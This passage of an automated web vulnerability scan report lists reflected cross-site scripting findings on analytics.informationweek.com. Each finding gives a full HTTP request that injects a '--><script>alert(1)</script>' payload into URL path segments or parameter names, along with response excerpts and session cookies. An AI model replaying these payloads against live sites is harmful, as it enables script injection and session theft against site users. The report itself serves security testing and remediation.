<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 106%2FFinancial%2FFinancial.html9221b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebde86b314b0&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0"> ...[SNIP]...
3.65. http://analytics.informationweek.com/menu/106/Financial/Financial.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/106/Financial/Financial.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b1f78--><script>alert(1)</script>119c5ed8843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nancial%2FFinancial.html%3Fb1f78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E119c5ed8843%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 280d2--><script>alert(1)</script>7fd66fc442e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... u280d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7fd66fc442e%2F13%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload f5cfa--><script>alert(1)</script>bc24ee3df37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F13f5cfa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebc24ee3df37%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9e007--><script>alert(1)</script>d20170e2eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:55 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... vices9e007--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed20170e2eff%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload bade7--><script>alert(1)</script>a6b7121472a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:50:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:50:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... es.htmlbade7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea6b7121472a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a"> ...[SNIP]...
3.70. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d1b3--><script>alert(1)</script>ffaca7e1bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F6d1b3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Effaca7e1bef%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3497a--><script>alert(1)</script>b14e7e078f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... enu3497a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb14e7e078f4%2F14%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8f0a9--><script>alert(1)</script>e0ead1f783e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2F148f0a9--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee0ead1f783e%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 99475--><script>alert(1)</script>1d835a1e36b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:42 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... pliance99475--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1d835a1e36b%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload d29e4--><script>alert(1)</script>8dfe7f79a8e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ance.htmld29e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8dfe7f79a8e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e"> ...[SNIP]...
3.75. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cb493--><script>alert(1)</script>3a29ce36218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... l%3Fcb493--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3a29ce36218%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b017--><script>alert(1)</script>b342dbc4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenu3b017--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb342dbc4ff%2F15%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 68690--><script>alert(1)</script>5ec01a42a8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... k.com%2Fmenu%2F1568690--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ec01a42a8e%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f21aa--><script>alert(1)</script>0b84347c146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 5%2FRisk-managementf21aa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b84347c146%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html"> ...[SNIP]...
